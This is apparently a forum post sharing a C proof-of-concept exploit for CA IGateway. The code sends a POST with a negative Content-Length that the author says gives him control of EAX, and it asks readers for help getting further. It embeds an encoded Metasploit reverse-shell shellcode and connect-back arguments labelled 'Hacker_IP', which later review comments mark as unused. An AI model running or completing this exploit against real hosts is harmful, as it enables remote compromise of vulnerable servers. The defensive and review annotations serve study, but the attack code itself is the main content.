Hey guys, I tested this code on an XP SP2 machine.
hope someone can help me further :P :P :P ...
Greets, mon11
//After reading:
http://www.frsirt.com/english/advisories/2006/0311
//And downloading @
ftp://ftp.ca.com (/priv/trial/BABr11/)
//I wrote some code; maybe somebody can help me with it. After sending this request 2 times I can completely overwrite EAX:
Code:
//IgateWay.exe negative content POC exploit
//coded by: mr N00B / mon11
//After sending 2 times we have complete control of EAX
//Don't have a clue what to do next :P
//noob_mon11@hotmail.com
#include <stdio.h>
#include "winsock2.h"
// Return value of the single send()/sendto() call below; printed before exit.
// File-scope so both the UDP and the TCP branch can assign it (nothing else in
// this file reads it). It is never checked against SOCKET_ERROR.
int bytesSent;
/*
 * PoC client for the IGateway negative Content-Length issue referenced above.
 *
 * What the code actually does, as written:
 *  1. checks argc, initialises Winsock and opens a TCP socket;
 *  2. connects to argv[1] on the hard-coded port 5250;
 *  3. sends one fixed 70-byte HTTP POST whose Content-Length header is -41,
 *     padded with 0x41 ('A') bytes;
 *  4. prints the send/recv counts and closes the socket.
 *
 * argv[2]/argv[3] (connect-back address/port) are parsed but never used, and
 * the `reverseshell` buffer is never referenced after its definition, so this
 * PoC only sends the malformed request — no payload is ever delivered.
 *
 * Defender's view: the only on-the-wire artefact is a POST carrying a negative
 * Content-Length, which is never valid HTTP and is cheap to log or reject at a
 * proxy/IDS in front of the service.
 *
 * NOTE(review): `_tmain`/`_TCHAR` come from <tchar.h>, and exit(), atoi(),
 * memset(), memcpy() need <stdlib.h>/<string.h>; none are included here, so
 * this presumably relies on what "winsock2.h" pulls in under MSVC — confirm
 * before building.
 */
int _tmain (int argc, _TCHAR* argv[])
{
// Reverse-shell payload (Metasploit-generated, per the author). DEFINED BUT
// NEVER USED: nothing below copies it into `payload` or sends it.
unsigned char reverseshell[] = // Metasploit-generated; unused below
"\xEB\x10\x5B\x4B\x33\xC9\x66\xB9\x25\x01\x80\x34\x0B\x99\xE2\xFA"
"\xEB\x05\xE8\xEB\xFF\xFF\xFF\x70\x62\x99\x99\x99\xC6\xFD\x38\xA9"
"\x99\x99\x99\x12\xD9\x95\x12\xE9\x85\x34\x12\xF1\x91\x12\x6E\xF3"
"\x9D\xC0\x71\x02\x99\x99\x99\x7B\x60\xF1\xAA\xAB\x99\x99\xF1\xEE"
"\xEA\xAB\xC6\xCD\x66\x8F\x12\x71\xF3\x9D\xC0\x71\x1B\x99\x99\x99"
"\x7B\x60\x18\x75\x09\x98\x99\x99\xCD\xF1\x98\x98\x99\x99\x66\xCF"
"\x89\xC9\xC9\xC9\xC9\xD9\xC9\xD9\xC9\x66\xCF\x8D\x12\x41\xF1\xE6"
"\x99\x99\x98\xF1\x9B\x99\x9D\x4B\x12\x55\xF3\x89\xC8\xCA\x66\xCF"
"\x81\x1C\x59\xEC\xD3\xF1\xFA\xF4\xFD\x99\x10\xFF\xA9\x1A\x75\xCD"
"\x14\xA5\xBD\xF3\x8C\xC0\x32\x7B\x64\x5F\xDD\xBD\x89\xDD\x67\xDD"
"\xBD\xA4\x10\xC5\xBD\xD1\x10\xC5\xBD\xD5\x10\xC5\xBD\xC9\x14\xDD"
"\xBD\x89\xCD\xC9\xC8\xC8\xC8\xF3\x98\xC8\xC8\x66\xEF\xA9\xC8\x66"
"\xCF\x9D\x12\x55\xF3\x66\x66\xA8\x66\xCF\x91\xCA\x66\xCF\x85\x66"
"\xCF\x95\xC8\xCF\x12\xDC\xA5\x12\xCD\xB1\xE1\x9A\x4C\xCB\x12\xEB"
"\xB9\x9A\x6C\xAA\x50\xD0\xD8\x34\x9A\x5C\xAA\x42\x96\x27\x89\xA3"
"\x4F\xED\x91\x58\x52\x94\x9A\x43\xD9\x72\x68\xA2\x86\xEC\x7E\xC3"
"\x12\xC3\xBD\x9A\x44\xFF\x12\x95\xD2\x12\xC3\x85\x9A\x44\x12\x9D"
"\x12\x9A\x5C\x32\xC7\xC0\x5A\x71\x99\x66\x66\x66\x17\xD7\x97\x75"
"\xEB\x67\x2A\x8F\x34\x40\x9C\x57\x76\x57\x79\xF9\x52\x74\x65\xA2"
"\x40\x90\x6C\x34\x75\x60\x33\xF9\x7E\xE0\x5F\xE0";
// Usage check: exactly three positional arguments are required. exit() rather
// than return is fine here because no Winsock state exists yet.
if (argc != 4){
printf ("Usage:\n------\n%s <Target_IP> <Hacker_IP> <Hacker_Port>\n\n",argv[0] );
printf ("\nExample:\n%s 207.68.178.16 192.168.1.100 65130\n\n",argv[0]);
printf ("Explain:\n--------\nThis will exploit target 207.68.178.16:5250 \nand connect back on 192.168.1.100:65130 via Tcp\n");
printf ("\n----> testing by mon11<-----\n");
exit(0);}
int port = 5250; //Hard Coded for Igateway
int protocol = 2; //Hard Coded TCP (1 would select the UDP branch below; never set)
// Connect-back address/port, XOR-masked with 0x99.. — computed but never used
// anywhere below. NOTE(review): the 0x99 mask presumably corresponds to the
// encoding of the `reverseshell` bytes above; not verified here.
unsigned long Reverse_ip = inet_addr (argv[2] ) ^ ( unsigned long ) 0x99999999;
unsigned short Reverse_port =htons( atoi (argv [3])) ^ ( unsigned short ) 0x9999;
WSADATA wsaData;
int iResult = WSAStartup( MAKEWORD(2,2), &wsaData );
// NOTE(review): a failed WSAStartup() is only reported, not fatal — execution
// continues into socket(), which will then most likely fail as well.
if ( iResult != NO_ERROR )printf("Error at WSAStartup()\n");
// `s` is only assigned when protocol is 1 or 2; any other value would leave it
// uninitialised at the INVALID_SOCKET test (unreachable as written, since
// protocol is the constant 2).
SOCKET s;
if (protocol==1) s = socket( AF_INET, SOCK_DGRAM, 0 );
if (protocol==2) s = socket( AF_INET, SOCK_STREAM,IPPROTO_IP);
if ( s == INVALID_SOCKET ) {
// NOTE(review): WSAGetLastError() returns int, but "%ld" expects long.
printf( "Error at socket(): %ld\n", WSAGetLastError() );
WSACleanup();
return 0 ;
}
// Target address: argv[1] is passed straight to inet_addr() with no check for
// an INADDR_NONE result.
sockaddr_in clientService;
clientService.sin_family = AF_INET;
clientService.sin_addr.s_addr = inet_addr(argv [1]);
clientService.sin_port = htons (port);
if ( connect( s, (SOCKADDR*) &clientService, sizeof(clientService) ) == SOCKET_ERROR) {
printf( "Failed to connect.\n" );
// NOTE(review): the socket is not closesocket()'d on this path.
WSACleanup();
return 0;
}
// Most important stuff
////////////////////////////////////////////////////////////////////////////////////////
// Request layout (70 bytes, all initially 0x41):
//   [ 0..16]  "POST / HTTP/1.0\r\n"            (17 bytes)
//   [17..39]  "Content-Length: -41\r\n\r\n"    (23 bytes) — the negative length
//   [40..66]  27 x 0x41                        (body filler)
//   [67..69]  "\r\n\0"                         (the NUL goes on the wire too,
//                                               since sizeof(payload) bytes are sent)
char payload [70]; //70 bytes; author reports EAX=0x41414141 after sending twice
memset (payload,0X41,sizeof (payload));
memcpy (payload ,"POST / HTTP/1.0\r\n",17);
memcpy (payload + 17,"Content-Length: -41\r\n\r\n",23); //-41 (bad request)
memcpy (payload + sizeof (payload)-3,"\r\n\0",3);
//printf ("%s",payload); //To see what is going on
////////////////////////////////////////////////////////////////////////////////////////
// End of important stuff.
// UDP
// NOTE(review): unreachable (protocol is 2). If it were taken, the socket is
// never closed, WSACleanup() is never called, and control falls off the end of
// the function without a return statement.
if (protocol==1) bytesSent = sendto(s,payload, sizeof (payload),0, (SOCKADDR*) &clientService, sizeof(clientService));
// TCP
if (protocol==2) {
// Result of send() is stored but not checked for SOCKET_ERROR.
bytesSent = send(s, payload, sizeof(payload),0);
// Receive buffer sized like the request (70 bytes).
char recvbuf[sizeof (payload)] = "";
// NOTE(review): bytesRecv starts at SOCKET_ERROR and the loop condition is
// `!= SOCKET_ERROR`, so the loop body below never executes — nothing is ever
// read from the server before the socket is closed, and the prints after the
// loop always show BytesRecv: -1.
int bytesRecv = SOCKET_ERROR;
while( bytesRecv != SOCKET_ERROR ) {
bytesRecv = recv( s, recvbuf, sizeof (recvbuf), 0 );
// NOTE(review): recv() returns a byte count or SOCKET_ERROR; WSAECONNRESET is
// an error code obtained via WSAGetLastError(), not a return value, so with a
// 70-byte buffer that half of the test can never match. Only `== 0` (orderly
// close by the peer) is meaningful here.
if ( bytesRecv == 0 || bytesRecv == WSAECONNRESET ) {
printf( "Connection Closed.\n");
break;
}
// Error path: returns without closesocket()/WSACleanup().
if (bytesRecv < 0){
printf ("BytesSent: %i\n",bytesSent);
printf ("BytesRecv: %i",bytesRecv);
return 0;
}
}
printf ("BytesSent: %i\n",bytesSent);
printf ("BytesRecv: %i",bytesRecv);
closesocket (s);
WSACleanup();
return 0;
}
}